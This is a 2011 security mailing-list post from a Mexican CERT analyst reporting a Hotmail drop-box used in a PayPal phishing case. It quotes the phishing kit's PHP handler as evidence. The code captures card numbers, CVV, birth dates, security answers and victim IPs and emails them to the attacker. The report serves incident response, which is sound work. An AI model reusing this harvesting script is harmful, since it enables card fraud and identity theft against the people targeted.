[nsp-sec] Hotmail phishing drop-box (Paypal)

David Jiménez ddavinci at gmail.com
Fri Jul 15 16:02:25 EDT 2011 

Hi Folks,

The email account bqq at hotmail.fr was found in a phishing case against Paypal
in Mexico.


Evidence
///////////////////////////////////////////////
<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message  = "------------------+ PayPal AU Bank Spam ReZulT's
+-----------------\n";
$message .= "First Name : ".$_POST['first']."\n";
$message .= "Last Name : ".$_POST['last']."\n";
$message .= "Date of Birth : ".$_POST['dd']." / ".$_POST['mm']." /
".$_POST['yy']."\n";
$message .= "Card Type : ".$_POST['cardtype']."\n";
$message .= "Card Number : ".$_POST['cardnum']."\n";
$message .= "Expiry Date : ".$_POST['month']." / ".$_POST['year']."\n";
$message .= "CVV2 : ".$_POST['cvv']."\n";
$message .= "Adress Line 1 : ".$_POST['address1']."\n";
$message .= "Adress Line 2 : ".$_POST['address2']."\n";
$message .= "City : ".$_POST['city']."\n";
$message .= "State : ".$_POST['state']."\n";
$message .= "Zip Code : ".$_POST['zip']."\n";
$message .= "Phone Number : ".$_POST['phone']."\n";
$message .= "Security Question 1 : ".$_POST['question1']."\n";
$message .= "Answer 1 : ".$_POST['answer1']."\n";
$message .= "Security Question 2 : ".$_POST['question2']."\n";
$message .= "Answer 2 : ".$_POST['answer2']."\n";
$message .=
"-------------------------------------------------------------------\n";
$message .= "Client IP : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$rnessage = "$message\n";
$message .= "-----------+ Created In {2011} By [demo3 hackerz]
+------------\n";
$send="bqq at hotmail.fr";

$subject = "PayPal AU ReZulT's Bank  $ip";
$headers = "From: AUSTRALIA PayPal Bank<demo3 at demo3.demo3yy>";
$str=array($send, $IP); foreach ($str as $send)
mail($send,$subject,$message,$headers);
mail($messege,$subject,$message,$headers);





header("Location: Finish.php?cmd=_account");
?>

Kind Regards
-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188

More information about the nsp-security mailing list